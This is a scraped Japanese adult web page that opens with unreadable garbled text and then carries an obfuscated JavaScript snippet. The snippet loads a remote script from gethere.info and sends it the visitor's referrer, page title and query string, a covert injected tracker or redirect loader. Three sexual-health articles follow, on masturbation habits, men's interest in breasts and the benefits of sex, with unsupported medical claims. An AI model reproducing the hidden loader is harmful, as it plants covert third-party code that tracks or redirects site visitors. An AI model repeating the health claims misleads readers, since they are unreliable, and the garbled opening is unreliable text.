a??e??a??a?Sa??a??a?�a?�a??a?�a??a?�a��a??a�?a�?e��a?�a??a??a��a?�??�a??a?�a?�a??a??a?�a?�a��a?�aS�a??e�?a?�a?�a?�a??a?�a?�a��a?�a?�a?�a��a?�a?�i?Y
c�?a?�40a�?a�?e�?a??a?�a??a�Sa��a??a?�a?�a?�a?�a��
a??a?�a?�a?�a�?a��a?Ya??a��a??a?�a��a??a�?a??a?�a�??��a�?a?�a��?��a?�a?�a�?a��a??a?�a?�a��a�?a??a?�a��

a??a?�a?�a?�a��a?�e�?a?�a??cY?a��a?Ya�?a?�a?�a??e??a???�?e��a��a?�a??a??a??a��a??a?�a?�a??a??a?�a��a?�a��

a??a�?a??a��a??a�?a�?a?�??�

20a�?a?�a��a??a�?a�?a?�??�

20a�?a??e�?a?�a?�a?�?��?�?a�?a?�aS�a??a?�a�Sa�??�?a?�a��a��a�?a�?a??a?�a??a?�a?�a�?a?sa?�a??a�sa??a�?a?sa??a?Ya??a??a?�a?Ya�Sa�?e??a�?a�?a�?a?�a?�a��a??a��a�sa?�a??a?Ya?�a?�a��

a��a??a�?a�?a?�a��?�Ya?sa??a?�c�?a�sa?�a?�a??a?�a?�a??e??a?�a?�a?�a��

?��e��a��a?�c�?a?�a�?a��a?�a??a????�a?�a��a�?a�?20a�?a�?a?Sa??a??a?Sa?�a��a��a??a�?a�?e��a?�a??a?�a?�a?�e?�a?�a??a?�a��

30a�?a?�a��a??a�?a�?a?�??�



30a�?a??a��a?�a?�?�?a�?a��a�?a��a?�a?�c�?a�?a?�a?�a?Ya??a??a?�a??a??a�sa??a�?a��a?�a?�a?�a��a?sa??a??a?�a??a?�a?�?�?a��a?�a??a?�a?Ya��

?�?a?�a��a?�a?�c�?a�?a?�a?�a??a?�a??a?�a�?a��a?�a��a?�a??a?�a??a?�a?�a??a?�a?�a?�a��a??a�?a�?a??a��a?�e�?a??a?Ya??a??a?�i??!a??a?�a?�?�?a��a?�a��a??a?�a�?a��a?�a�?a�?a?�a??a�????a?�a?�a��?�Ya?sa??a??a?�a??a?�a?�?�?a??a?�a��cs�a?�a�sa?�a??a?Ya?�a?�a��

40a�?a?�a��a??a�?a�?a?�??�


40a�?a??a?�a?�a??a??a??a?�a??a�?a??a��a?�a?�a��?��??Ya?�a?�a��

a?�a?�a??a??a?�a?�eY?a?�?��?�?a??e?�a??a?�a??a��a?�a??a??e�?a??a��a�?a??a?�a��

c�?a�sa?�a?�a�?a?�a??a��a??a??a??a��a?�a??a?�?�?a?�a?�a��?�Ya?sa??a��a??a??a??a��a�?a?�a?�a�?a?�a?�a?�a��a?�a?�?��??Ya?�a��a��a?�a??a?�a��a?�a?�a??a??a?�a??a??a�Sa�?a?�a�?e?�a?�a�?a��a??a�?a�?a?�a�?a?�a??a??a?�a??a��a??a??a�sa?�a�?a?�a?�a�?a?�a?�a?�a��

50a�?a?�a��a??a�?a�?a?�??�

50a�?a?�a??a??a�?e�?a?�a��c��a�?a�Sa�?a�?e�?a?�a?�a��e��a?�a?�a??a��a��a??a�?a�?a?�a�?a?�a??a�Sa��a??a�?a�?a��a?�a??a?�a??a??a�sa?�a�?a?�a?�a?�a�Sa??a?�a��

a?�a??a�?a?sa?�a?�?�?e��a?�a??a�?a�?a?�a??e�?c��a?�a?�a�?a��a��a?�a?�a?�?��e��a??a�sa??a??a��a?�a??a?�a??a?Ya�?a�?e��a?�a��?�?a��a�sa?�a?�a?�a??a�?c��?��a?�?��?�?a??a??a��a��a??a??a??a??a?�a??a??a?�a?�a?�a�?a�z?��a??a��a??a?�a??a?�a?�a?�a��

c��?��a???�?a?�a��a??a�?a�?e��a?�

c��a?�a??a??a�?a??a?�a??a��e??a?�a??a??a?�??Z?�?e??a?�a??a?�c��cs�a?�a???�?a�?a�?a��a??a?�a?�?�?a??a�sa??a�?a?�a��e??a??a??a?�a??a?�a?�?�?e��a??a?�a�Sa??a?�a?Ya��

a?�a?�a??c�?a�sa?�a?�a�?a�?a?�a???�?a?�a?�a??a?�a???Z�a?�?�?a?�a?�a?�a?�a?�a?�a��a��a??a??a?�a��

c�?a??a?�a?�a��e��a?�a?�a��a?�a?�a�?a??a?�?��a?�a?�a�?a?�a??a??a?�a??a?�a?�?�?e��a��a?�a�Sa??a?�a?Ya��
a??a?�c�?a�?a�?a?�cs�a?�a?Za??a??a��a�?a?�a?�a�?a?�a?�a?�a��

a?�a?�a??a�?a?�a??a�?a?�??Z?�?a?�a?�a��a?�a?�a??a?�a?�?�?a??a?�a��cs�a?�a�sa?�a??a?Ya?�a?�a��

a??a?Ya�?a?Se��a��e??a��a??a?�a?Ya??a??a��a�????c��a?�a�?a?�a?�a?�a?Ya?�a??a?�a?�?�?a��a?�a??a?�a?Ya��

a???��a???�?a?�a��a??a�?a�?e��a?�

a???��a??c��?��a�?a�Sa?�a?Ya??a??a?�a??a?�a?�?�?e��a??a�sa?�a??a?Ya?�a?�
a��
??�e?�a?�a??a�?e��e?Ya??a�?a??a?�a?�e?�e��a??a??a��a�Sa??a?�a?Ya??a�?e�?a?�a?�a��a?�a?Ya?�a??a?�a?�?�?a??a?�a??a�?a?sa?�a???�?e��a?�a?�a?�a��

a?�a?Ya??a??a?�a?�a?�c�??��a?�?��a�?a��a�?a�?a?�a�?a��?�?a??a??a?�a��a??a��a?�a��a??a?�a?�a?�a��

c�??��a?�a?�a??a??a??a??a?�a?�a�?a�?a�?a?Ya??a??a?�a�?a??a?�a?�a?�?�?a?�a?�a�?a��a??a�?a�?a��a?�a��a?�a?�?��??�a??a??a�?a��a�?a?�a??a?�a??e��a?�a??a��a??a?�a?�?�?e��a��a�sa?�a??a?Ya?�a?�a��

a��a??a�?a�?a��a?�a��a?�a?�a??a??a??a??a��?�Ya??a��a�?a��a?�a?�a?�a��a??a?�a?�?�?a??a�sa?�a?�a?�a?�a��

a??a?Ya�?i?�i??a�?a�?e�?a?�a??a�?a�z?��a�?a�Sa��a??a�?a�?a?�e??a��?��a�?a��?�?a??a�sa??a?�a??a?Ya?�a?�a��

a???��a??a�?c��?��a�?a�Sa?�???a��a?�a��a?�a??e?�a?�a??e?�a�?a�?a?�a?�a?�a�?c�?e?�a��c�?a��a?�a??a?�a?�???a��a?�a�?a��a?�a��a?�a?�a??a��a??e?�a�?a�?a?�a?Sa�Sa??a?�a��

a???��a??e�?a?�a??a??a�?a�Sa��a�?a??e??a��e�?a?�a��a??a?�a?Ya??a??a��a??a�?c��?��a??a??e??a��e�?a?�a��a???��?�?a????�a��a?�a��a?�a?�a�?c��a??a???�?a?�a��a??a�?a�?a??e�?a?�a?�a?�a?�a?�a��

a��a��a?�a??a?�a??a��a��a??a�?a�?e��a?�

a��a��a?�a??a?�a??a��a��a??a�?a�?e��a?�a??a?�a?�???a?�a?�a�za??a?�a??a�Sa��a??a?�a?�a?�a��

a�?a?�a??a?�a��a?�a?�a??a?�a?�a?�a��a�?a�Sa??a?�a??a?�a?�c�??z?a??a??a??a?�a?�a��a?�a?�i?Y?�?e��a��e?za?�a?�a??a??a?�a��a?�a��

a�?a?�a??a?�a��e�?a?�a��a��a?�a??a�?a��a??a?�a?�a?�?��a?�a��e��a?�a��a??a?�a?�a?�?��a??a??a??e��a?�a?�a��a��?�?a??a�sa?�a?�a?�a��

a�?a?�a��e�?a??a?�a?�a��a��a��a?�a??a�??Z�a?�?�?a��c��a?�c�?a�?e��a?�a??a��a??a??a??a��a�?a?�a?�a?�a��

a�?a?�a??a?�a��a��a��a?�a??a�?c�?a??a��a??a�?a�?a?�a�?a?�a??a�Sa��a?�a?�a�?a?�a?�a?�a��

a??a?Ya�?a�?a?�a??a?�a��a?�a??a?�a?�a��e�?a�?a��a?sa��a?�a??a?�a?�a??a?�a??a??a?�a�?c�?a�sa?�a?Ya??a?Sa?�a?�a��a?�a?�a?�a�?e?�a?�a?�a??a??a?�a�???Z?�?a?�c��a?�a?�a�?a��a?�a?�a?�a??a??a?�a��a?�a?�a??a?�a?�?�?e��a??a��a??a??a��a�sa?�a??a?Ya?�a?�a��

a??a??a�?

a??a?Ya�?a��a??a�?a�?a?�e��a?�a??a?�c�?a�sa?�a?�a??20a�?a?�a?�a??a��a?�a??a�?a?�a??a��a??a??a??a��1a�z1a�za��a��a?�a?�???aZsa??a��a??a�?a�?a��e??a??a?�a?�a��a?�a??a??a�?a?�a�Sa??a?�a?Ya��

e???�?a?�a��a??a�?a�?e��a?�a??a�?a??a?�a�?a�Sa�sa?�a??a?Ya?�a?�a?�i?Ya��a??a?�a??a?Ya?�a?�a?�i?Y

a��a??a�?a�?a????�a??a?�a?�a??a?�a??a??a��a??a?�a?�?�?a��a?�a��a???�?a?�a??a?�a��

?�Ya???�?a??a??a??a�?a?za�?a??a?�a?�a�?a?�a??a??a?Sa??a???��??�a��?��a�?a�?a?�a�??�?a?�a��a�?a��a��a??a�?a�?a��???a?�a??a?�a?�a?Ya?�a?�a?�a?�!!

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

【男としての危機?!】絶対してはいけない6つのオナニーの罠

みなさんは普段どのようにオナニーをされていますか?また、普段のオナニー方法は正しくできていますか?

普通にペニスを握ってシゴくのが一般的なやり方ですが、今ではアダルトグッズの進化などによって色々なオナニーの仕方があります。

色々な種類のオナホールや電マなどのアダルトグッズが発売したことで今では数え切れないほどのオナニーの仕方が生まれてきました。
快楽を追求した結果に生まれたオナニー法の中には、体を痛めてしまったり男性器にダメージを与えてしまう方法も数多く存在します。

今回は、数あるオナニーの中から、絶対にやってはならないオナニー法をご紹介したいと思います。

SEXをしていない期間にも射精機能を衰えさせないために、正しいオナニー方法でしっかり勃起力、射精力を維持していきましょう。

寸止めオナニー



射精感がこみ上げてきてギリギリの所で止めるのが寸止めオナニーですが、これは精子を作る役割を担う精巣にとても負担がかかります。

早漏の改善策として寸止めオナニーが上げられていますし、寸止めをする事でオナニー時の快感も上がるのですが、オナニーを長引かせ過ぎるのは危険です。
寸止めは精子を留まってしまうため、精管にダメージを与えたり、精子が逆流してしまい、膀胱炎や尿道炎の原因にもなってしまいます。

医学的な根拠があるとはいえませんが、寸止めオナニーをした事で、何か障害が起きたり、ひどい人では睾丸切除をすることにもなった人もいると言われています。

早漏防止の効果が期待できるといわれている寸止めオナニーてすが、長引かせ過ぎるのはよくないでしょうし、睾丸を切除してしまえばセックスどころではないので、筋トレなどで早漏防止は期待できるので、早漏で悩んでいる方は、別の方法で対策をしましょう。

床オナニー

床に擦りつけてする通称床オナですが、実はこのオナニーの仕方はとても危険なのです。
ペニスを床に擦りつけるため、このまま続けているとペニスが変形してしまう危険があります。
さらに、恥骨に圧力が一気にかかりこすりつけるので、やりすぎると恥骨を疲労骨折したり、骨が削れていくこともある上に、ペニスにかかる圧力は膣内の圧力よりも強くなってしまうので、セックスをする際に膣内でイケなくなる可能性があります。

ペニスが変形するだけではなく、射精障害の原因にもなりますので、床オナはしないようにしましょう。

足伸ばしオナニー



イク際に足を思い切りピンと伸ばすオナニーの仕方がありますが、足を伸ばしながらオナニーは射精障害になる可能性があります。

足を伸ばしてオナニーをするのは、たしかに快感も増しますが、この方法を続けるのも膣内射精が出来なくなる恐れがあり、足を伸ばすことに慣れてしまうと、セックスで射精する際にも足を伸ばさなくては射精できなくなる体になってしまう恐れがあり危険です。

もし、足を伸ばしてオナニーでしかイけないという方は、足を伸ばして得る快感の代わりにローションを使ってオナニーしましょう。
ローションを使うだけで快感は数倍上がるので、足伸ばしオナニーをしている人は、足伸ばしの快感をローションで補い、普通に射精をするようにしましょう。

ハードグリップオナニー

これは普通にペニスをしごいてするオナニーなのですが、普段どのくらいの力で握っていますか?

強めのグリップでオナニーをしているのなら、それはとても危険です。
ハードグリップでオナニーを続けると、締めつけが強くなくては射精出来なくなってしまい、セックスをする時は、女性の締めつけでは物足りず、オナニーでしか射精出来ない状態になってしまいます。

オナニーをする時には、グリップが少しゆるいと思うくらいが丁度いいです。
もし刺激が物足りなくなった時は、ローションを使うと刺激が強くなるので、グリップは強めずにローションで対応しましょう。

ローション代わりに石鹸でオナニー



ローションを買うのが恥ずかしかったり、買いに行くのが手間だからという理由で、ローションの代わりに石鹸を使ってオナニーをする方がいますが、これはペニスや尿道が炎症を起こす原因になります。

石鹸はもともと体を洗ったりするもので、ボディソープよりも洗浄力が強力なため、デリケートな男性器を保護している成分まで落ちてしまい、腫れてしまったり、炎症を起こし、重症の人は亀頭包皮炎になってしまうこともあります。

また、オナニーをしているときに気づかないうちに尿道に石鹸が入っていたりすると排尿時に痛みが生じたり、尿道が炎症を起こしたりすることもあります。

オナニーで潤滑剤を使いたいという人は横着したりせずに、オナニー用のローションを用意しましょう。

アナニー

アナルに大人のおもちゃなどを入れてするアナニーの快楽は、女性が絶頂を迎えた時と同じくらい、もしくはそれ以上の快楽を感じることが出来ると言われています。

しかし、アナニーは一歩間違えると、体に悪影響を及ぼす場合があります。

まず、潤滑剤なしでアナニーをすると、肛門や腸内が切れてしまったり、傷ついてしまいますし、傷口から大腸菌が侵入したりすると、炎症を起こし、病気を引き起こす恐れがあります。

また、アナニーの快感はセックスの快感にも勝るものなので、セックスの快楽では物足りなくなり、女性とのセックスでは満足できなくなってしまいます。
アナニー専用の器具が販売されてはいますが、やりすぎは射精障害にも繋がるのでなるべくしない方がいいでしょう。

まとめ

いかがでしたでしょうか?
普通にオナニーをしていても、知らないうちにグリップが強くなりすぎていたりと、気づいていないだけで間違ったオナニーの仕方をしている可能性があります。

間違ったオナニーは、セックス時に障害になることが起きてしまったり、射精障害、勃起不全など様々な障害を引き起こしてしまうかもしれません。
最近セックスでなかなかいけない)など、夜の生活で悩んでいたり、(最近おしっこすると痛いな)と感じている人はもしかしたら間違ったオナニーが原因でそのようなことが起きているのかもしれません。

思い当たる節がある方は、重症化してしまう前に改善して、健康な状態で心置き無くオナニーできるようにしましょう。

【メスとしての象徴だから?】男がおっぱいを愛する4つの理由とは?

世の女性達は、我々男性にたいして(男はどうせ巨乳が好きなんでしょ)(巨乳の人にばっか目がいってムカつく)と感じている人がとても多いです。

この女性の考えはとても的を得たもであり、夏場は露出も増え、胸元が開いた服を着るだけで、大半の男性は目がいきますし、女性がかがんだ時に見えそうで見えないといったことにロマンを感じる男性も多数いるでしょう。

無いものねだりかもしれませんが、おっぱいが小さい人たちは巨乳の人をとても羨ましく思いますし、好きな男性が巨乳好きと知れば、(やっぱり胸って大事なんだな)と悲観的に感じてしまう女性もいます。

では、なぜ我々男性がおっぱいに対してここまで執着心、ロマンを抱き、おっぱいに興味を抱くのでしょうか。
メスの象徴とも言える豊満なおっぱいに我々男性は性的興奮や、ロマンを覚えます。

しかし、女性は男性の象徴とも言えるペニスには関心すら抱かず、人によっては気持ち悪さすら覚えます。
同じ象徴に対してなぜここまで差があるのでしょうか。

おっぱいの魅力とは一体何なのか、そもそも我々男性という生き物にとっておっぱいとはなんなのかというのを今回は解明していきたいと思います。

そもそもおっぱいとはなんなのか



まずは根本的な所からですが、おっぱいとはいったい何なのかということですが、おっぱいとは、本来はただの脂肪の塊であり、女性ほど豊満にはならずとも、我々男性にもついているものです。
しかし、おっぱいそのものに興奮するのであれば、女性のおっぱいではなくても、同じ男性のおっぱいでも良いはずです。
しかし、大半の男性は女性の豊満なおっぱいに興奮し、目線の中におっぱいが入るだけで、目線はおっぱいへと向かい、注意力が散漫になることさえある。
一体何が原因で、我々は女性のおっぱいに興奮をおぼえるのでしょうか。

科学的根拠に基づいた男性がおっぱいを愛する理由

なぜ人々はこれほどまでにおっぱいに興味、ロマンを抱くのかということについて科学的な研究がされており、いくつか解明されていることがあるようです。

授乳期に関係がある?



我々は生まれてから母乳によって育つのが一般的ですが、実はこれが男性がおっぱいを愛することと関係しているようです。

赤ちゃんが飲む母乳には、愛情ホルモン(オキシトシン)と呼ばれる物質が含まれているようで、これが赤ちゃんの精神を安定させる役割を担っています。

これを吸収しながら赤ちゃんは育つため、大人になっても愛情ホルモンを潜在的に求めるのが、男性がおっぱいを愛する理由の一つとして考えられます。
また、赤ちゃんは口元から安心感を感じ取るため、母乳に対してとても安心感を覚えます。
そのため、授乳期がおわってもおしゃぶりを加える子がいるようです。

この二つから考えられるのは、潜在的に愛情と安心感を求めているから、我々男性はおっぱいを愛し、おっぱいを触ったり、舐めたいという感情を抱くのではないでしょうか。

パートナーを奪われないように

授乳期以外にもあげられる理由として、男性が自分のパートナーを他の男性に奪われないようにするためというのも考えられます。

女性のおっぱいを男性が愛撫することで、授乳時にも出るオキシトシンが分泌されます。

オキシトシンが分泌された女性は安心感を抱き、自分のパートナーといると安心するといった理由から愛情がより強まります。

そのため、他の男性に目移りしないといった浮気を抑止する効果が期待できたり、パートナー同士での信頼関係を深めることができるのではないでしょうか。
男性が女性のおっぱいを愛撫することで、女性は母乳をあげている時と同じ感情を男性に抱くため、我が子のような特別な感情を抱くのでしょう。

出産の準備ができていると感じる



おっぱいが豊満な女性からはセクシーさや大人の色気を感じませんか?

幼い子供の状態では出産することができませんが、しっかりと成熟した大人の女性なら、子孫を残すことができます。

男性は、豊満なおっぱいの女性を見ることで、母体が健康的だから元気な赤ちゃんを産めるという風に解釈しており、女性が本当に健康的であるかは別として、男性はおっぱいから女性の健康状態までもを読み取ろうとする生物的な本能が働くため、視界におっぱいが入ると目線がそちらにいってしまうのです。

どうやら、おっぱいは女性の象徴、セックスアピールになるだけではなく、母子としての健康状態としても表しているようです。

男性が胸に執着するのは人間だけ?

これまで、男性が女性のおっぱいに執着する理由をいくつか挙げてきましたが、男性がおっぱいに対して性的興奮を感じたり、愛撫したいと感じるのは、人間だけの特性であり、その他の哺乳類ではおっぱいに対して執着心を抱かない上に、この本能は生まれたと同時に身につけるものだそうです。

なので、他の動物は性行為をするときに乳首を責めたりはしません。
おっぱいを性感帯と捉えるのもまた、人間だけの感性なのです。

男性は、女性のおっぱいを刺激することで、女性の興味関心を自分に向けることができると潜在的に認識しています。
そして、男性は女性との絆を強固なものにするため、他の哺乳類とは違い女性の胸に対して特別な感情を抱くのではないかと言われています。

まとめ

いかがでしたでしょうか?
男性にとっては、我々がおっぱいを好きというのは息をするように当たり前だったと思います。

しかし、なぜ男性はおっぱいが好きなのかということを考えたことがある人はそう多くはないのではないでしょうか。

なぜおっぱいが好きなのかと誰かに聞いてみたところで「男なんだから当然だろ」「男がおっぱいを好きなことに理由はないだろ」と帰ってくるのは目に見えています。

それほど、男性がおっぱいが好きというのは当たり前になっているのです。

今回ご紹介したように、我々がおっぱいが好きなことにも必ず理由があり、男性なら当然とも言える理由ではありました。

よりパートナーと絆を深めたいと悩んでいる方は、おっぱいへの愛撫をすることで心の距離を近づけられるかもしれません。
セックスでは女性器への愛撫がいきがちですが、おっぱいがもたらす効果を再認識した上で、より女性と絆を深めるためにおっぱいへの愛撫も怠らぬように気をつけてみてはいかがですか?

SEXをすることで健康になる?!セックスの驚きの効果!

SEXはよく、快感を満たすものと思われていますが、実際はダイエットなどの健康法にもなっています。

この効果についてはあまり知っている人は少なく、ダイエットや健康に気を使っている女性ですら知らないため、SEXを勧める理由にもなります。

最近では大学の研究により詳しく解ってきているため、今回はSEXでの知られざる効果について詳しくお話したいと思います。

SEXで得られる良い効果

ダイエット効果が得られる。



セックスをすることでどのぐらいのカロリーが消費できるかあなたはご存じでしょうか?

まずキスだけで68キロカロリー激しいキスの場合は90キロカロリーとも言われています。

では次にイチャイチャに関してはどうでしょうか?
汗をかくぐらいのイチャイチャの場合は30分で238キロカロリーも消費することができます。

さて気になるセックスに関してですが体位によりますが150キロカロリー~250キロカロリーも消費できるのです。

「250キロカロリーってどのぐらいのもんよ?」と思われる方がいるので指標を挙げておきますね。

体重によって消費されるカロリーは違うものの、ウォーキングは100キロカロリー
ランニングの場合240キロカロリーとなっております。

30分ランキング続けるって結構きつくないですか?

これだけを聞くとセックスは欲求も満たされエクササイズにもなるとゆう最高のダイエット方法なのです。

心臓発作のリスクが下がる

20年以上に渡るイギリスの研究でセックスを週に2回以上行う人の方が月1回未満の人に比べて致死的な心臓発作が約半分になった事が分かっています。
高齢者はセックスが脳卒中の原因になる事を心配しているが、研究ではセックスの回数と脳卒中には関連性が無いとしています。
女性の場合は、美容にもいいとされているためお互いプラスになることばかりなのです。

免疫力の向上

免疫力では、セックスを週に1~2回する人の方が風邪やその他の感染から体を守ることができます。

理由としてはストレス発散が一番の理由に挙げられます。

ですが気を付けて欲しいのが、疲れているときのセックスでは免疫力は上がるどころか下がってしまう場合もあります。

やはりセックスというのは体力を使う行為なので弱っているときに病原菌が体に入り込んだりしてしまう場合もあるので、仕事でぐったり疲れた後などではなく、休みの日や仕事が早く終わった時には積極的に望むのがいいですね!

セックスは恥ずかしいことでもあるが、自分の体を守る為に必要なことであります。

朝SEXこそ最強?!



そして、さらに効果が期待されるのが、朝セックスです。
「朝から、セックスはしんどい、口臭が気になる」と思ってしまう人が多いかと思っている方も多いでしょうが、朝はSEXはさらに効果的なのです!

まず、朝にセックスをすることによって、1日のリズムが物凄く良くなるため、脳に酸素が回ることで、活性化され、仕事や、勉強がスムーズに進むとされています。

また、男性は夜より朝の方が男性ホルモンの分泌量が多くなる傾向にあります。

いいところは男性だけではなく、女性にもあります。

朝にすることで、女性ホルモンが分泌され、肌にツヤ、髪の毛に潤いなど与えてくれます。
ストレスで肌荒れが起きてるとき、化粧品などを使うのではなく朝にパートナーとセックスをするのもアリだと思います。

朝の忙しい時間にはセックスはできませんので、互いの休日の朝などにすることによって、お互いの親密度がかなりあがります。

最近の日本では、マンネリ化などの問題があげられていますが、マンネリの解消のきっかけにもなるかもしれません。

またセックスは毎日することでさらに効果があります。

毎日は大変でしんどい。なんて誰もが考えていると思いますが、全ては自分とパートナーの為なのです。

健康に良くないセックス


それは、愛のないセックスです。

愛のないセックスは、自分の欲求を済ませるしか効果はありません。

ストレスを感じるセックスは無酸素状態になってしまい、肌荒れ、シミなどができてしまい老化の原因となってしまいます。

愛のないセックスになりやすい代表格として挙げられるのがマンネリ化です。

毎日セックスをする夫婦はマンネリ化してしまい、習慣化されていきます。習慣化されてしまうとマンネリになってしまうと思われるのであえてマンネリ化という言葉は抜いてもいいかもしれません。この上下2行まとめてもいいですね。
習慣化されることにより、お互いのことが深く分かり合え、長続きの秘訣なのかもしれません。

また仲直りをする時などは、物凄い効果が期待できます!

日頃のイライラがたまりストレスになっているとき、セックスはストレス解消にもなりますし、2人の関係が戻ることは間違いありません。

まとめ

セックスに悩まされて頭をかかえていた人はいると思います。
セックスを通してコミュニケーションもとることができるため、憂鬱にも効くとゆわれています。

さらに近年では薬であったり、大人のオモチャであったりと、深め合うには十分な状態になっています

女性もセックスに対しては、心の会話や、コミュニケーションと思っている人も少なくありません。

今のパートナーと愛を深めながら、健康、美容にいいのと信じてセックスをしてみるのはどうでしょうか?

他にも様々なら効果は、研究によってみつかってきているので、是非、男性も女性も一緒に考えてみてはいかがでしょうか?